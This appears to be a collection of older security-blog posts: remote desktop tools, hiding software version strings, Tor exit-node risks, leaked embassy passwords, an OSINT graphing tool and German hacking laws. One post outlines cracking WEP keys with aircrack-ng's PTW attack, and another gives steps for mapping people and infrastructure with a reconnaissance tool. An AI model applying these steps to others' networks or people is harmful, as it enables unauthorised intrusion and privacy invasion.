base under attack
ethical hacking, penetration testing, IT security and other news

I had been searching for a secure remote desktop solution for Linux for years. Most solutions I had tried were either terribly insecure or painfully slow, or both. Various flavors of VNC (and friends) have been plagued with security holes, lack of encryption, and poor speed. Microsoft Terminal Services and Remote Desktop, although faster than VNC and with better authentication, does not offer encryption and obviously does not run on Linux.

NoMachine NX is a fast, secure remote desktop system that can run servers on Linux and Solaris, and clients on just about anything else. It encrypts all communications by tunneling them through SSH, and offers certificate-based authentication. All this, and it somehow performs at near native speed, being about the closest thing you can get to actually sitting in front of the box. Unlike VNC, which runs in an existing session and essentially hijacks the keyboard and mouse of the console, NoMachine NX spawns a new X session for each connection, and allows you to disconnect from that session without ending it.

Oh, and it’s a free download. I’m a huge fan.

It’s very common for open source web applications (as well as some commercial software) to place a “Powered by ____ version x.x.x” notice on publicly accessible pages. Other than advertising purposes, there is little or no reason to disclose this information. While some license agreements require that the notice stay visible, you can usually remove the specific version number and stay compliant. If not, talk to the vendor - you shouldn’t have to give away your specific implementation details to the world.

So why is this an issue? Because it allows for easy enumeration of vulnerable sites using Google and other search engines. This type of reconnaissance is completely passive and easy enough for any script kiddie to do. When a new vulnerability is announced for Coolblogprogram v1.2.3, you better believe there will be script kiddies all over the world searching Google for “Powered by Coolblogprogram v.1.2.3″. Scripts for mass exploitation can easily be written when it’s that easy to get a list of vulnerable sites.

Have you been hacked through a popular web-based application? Check your traffic statistics for search engine queries - there’s a good chance, if it was a common exploit, that someone just searched for the vulnerable version number and found your site, or that a bot did the same.

Unless you have a really compelling reason to tell all your visitors exactly what version you are running, I highly recommend removing the version number from all publicly accessible web pages. This can be easily done by editing the header and footer templates of most web-based software. While this may not stop a determined hacker from figuring out what you’re running, it cuts down on the script kiddies that love to mass exploit and deface sites running popular web apps.

These notices are usually found in the following places:

1. Web site footer - near the copyright notice at the bottom

2. Title tag

3. Meta tags - such as generator, description, and keywords

4. Other locations. Run a find or grep on the HTML source to see if there are any hidden notices.

Disclaimer: I don’t recommend “security through obscurity” (of which this is an example) as an effective security approach. However, with the plethora of spam bots, wannabe google hackers, and script kiddies - using this technique of anonymizing your web-based applications could save you a lot of trouble, and reduce the malicious traffic you receive. Just keep in mind that ultimately, the application is still just as vulnerable as it was before.

Tor is a anonymity system based on so-called “onion routing”. It is supposed to allow for anonymous web-browsing, instant messaging, file transfer, and more. It does this by creating virtual tunnels between you and your destination, over the Tor network. The information sent over the Tor network is encrypted and its origin is very difficult to trace. Users of Tor can opt to relay traffic for the Tor network or even run a server which acts as an exit node (the final hop between Tor and the destination). Both the Tor service and the software are free.

However, there are some significant dangers in using this service. For one, the exit node servers (which see the final, unencrypted traffic before it goes to the destination) are not regulated in any way and can be run by anyone willing to download and install the software. This can present significant risk if the exit node is being run by an untrusted party. The other issue is the liability of relaying Tor traffic, or running an exit node - there is a chance that you will be passing illegal traffic through your machine and your own internet connection. And while the Tor website may focus on the legitimate uses of this service, this is the real world, and you better believe there is some very bad stuff going through that network.

By this time, you have probably figured out how Dan Egerstad, the “researcher” who published the embassy email passwords, acquired this data. He simply ran his own servers that acted as exit nodes for Tor. The data was not encrypted, and using Tor actually put the data at risk rather than anonymizing anything.

Dan Egerstad, a Swedish security consultant, has discovered a vulnerability that has given him access to passwords for thousands of email accounts belonging to foreign embassies around the world. After attempting to contact some of the victims and receiving no response, he made the decision to publish 100 of these passwords on a blog.

Egerstad claims to have already read thousands of emails from these accounts, many containing very sensitive information. The only information he released about the vulnerability was that it involved a free email encryption program that was misconfigured and was being used in a way that the vendor recommended against. The passwords were gathered using passive “man-in-the-middle” attacks on unencrypted data. No further details have been made available.

The list includes emails belonging to embassies of Kazakhstan, India, Russia, Uzbekistan, Kyrgyztan, Japan, Mongolia, and more. Other emails belonged to The Office of Dalai Lama, the UK Visa Application Centre in Nepal, and the Hong Kong Democratic Party. No US embassies were on the list.

A quick glance at the list shows poor password policy in many cases. Passwords like “1234″, “123456″, and “password” are a few examples.

Paterva Evolution is a new reconnaissance tool that can quickly create graphs of the relationships between both internet infrastructure (such as domain names, IP addresses, and web sites), and personal attributes (such as names, emails and phone numbers). It’s based on Java and runs on Windows, Linux, and Mac OS X. The GUI is in beta, but appears to work pretty well so far.

The rate at which you can gather intelligence with this tool is amazing. Starting with a single attribute, such as a domain name, you can perform “transforms” to gather all kinds of related information found around the internet. This process is very fast and results in a graph showing the links between different data, as well as specific details on each attribute. Transforms on attributes like names or emails go as far as to pull up photos from social networking sites.

There’s little or no documentation available yet, unfortunately. Getting started with the UI can be a little confusing at first, but here are some basic steps:

1. From the “Palette” pane on the right, click and drag an icon for whatever information you want to begin with (such as a domain name) onto the graph (the main window in the middle).

2. Double click the icon in the graph to edit it.

3. Right click on it to see a list of available transforms (data that can be gathered and related to it). Choose “All Transforms” to perform them all.

4. A new list of icons should appear, connected to the original item. Select any item to see the details in the “Evolution Detail View” on the right. You can perform additional transforms on any of these items by right clicking and selecting transforms.

5. You can click and drag any item around the graph. The scroll wheel on your mouse will zoom in and out, which will be useful as you start to gather more data.

It has been trivial to break WEP for years now. Automated tools using statistical attacks and traffic injection have made it easy to break WEP keys (both 108-bit and 40-bit) on average laptop or desktop hardware in a matter of hours.

Now, it is even more of a joke to break WEP. A new attack, called PTW, has been demonstrated to break 108-bit WEP keys with as little as 40,000 IVs - which can be done via injection in only minutes. If you’re still using WEP, stop it. Now.

The PTW attack has been implemented into aircrack-ng versions 0.9 and up. New versions of aircrack-ng can be downloaded here. For those of you using Backtrack 2 - it comes with an older version of aircrack-ng, so you’ll need to upgrade either by compiling the source or using the latest Slax module (which is a development version, but it usually works well).

The process of breaking the key using PTW works similarly to the old attacks - start gathering a capture file with airodump-ng, inject traffic with aireplay-ng to speed things up (if necessary), and load the capture files into aircrack-ng. There are a few minor differences:

1. The PTW attack will give up very quickly if you don’t have enough IVs, rather than going on forever like the old methods (with probably no chance to crack the key). It will resume cracking for every 5,000 additional IVs, rather than tying up your resources in between.

2. The PTW attack only works with full capture files. Files containing IVs only (.ivs) are not currently supported.

3. You must use the -z option in Aircrack 0.9.x to use the PTW attack. In the latest development versions (1.0.x), this attack is the default.

I’ve tested the PTW attack on my access point at home, and it was able to retrieve a 108-bit key with about 50,000 IVs. Injecting the traffic using aireplay-ng’s ARP attack took only a few minutes. 40-bit keys can be done even faster.

New German anti-hacking laws, in effect as of Sunday, have made it illegal to possess, create, or distribute hacking tools (aka security tools) that could be used to commit crimes. Vague wording makes this potentially include things like nmap and Nessus, which can just as well be used for ethical hacking purposes. And I’m sure this most certainly will include exploit code, password crackers, and mass exploitation tools like Metasploit.

Some security research teams and sites, which hosted “hacking” tools (aka security tools) and proof of concept exploits, are already in the process of moving their operations to other countries, such as the Netherlands. Phenoelit, Kismac, and Month of PHP Bugs have already acted.

And what does this mean to security professionals? Or even network administrators auditing their own networks? I’m sure the law was written with good intentions, but this kind of unclear wording is going to cause some serious issues in the security field.

I’m definitely not bringing my laptop to Germany…

Backtrack 2 is a live CD linux distribution designed for penetration testers. It is packed with hundreds of ready to use tools for security professionals, and is based on Slax (live CD Slackware).

This mini-tutorial will show you how to get Backtrack 2 up and running inside VMware Workstation, and installed to the HDD. This should work the same in both VMware Workstation 5 and 6. Read the rest of this entry »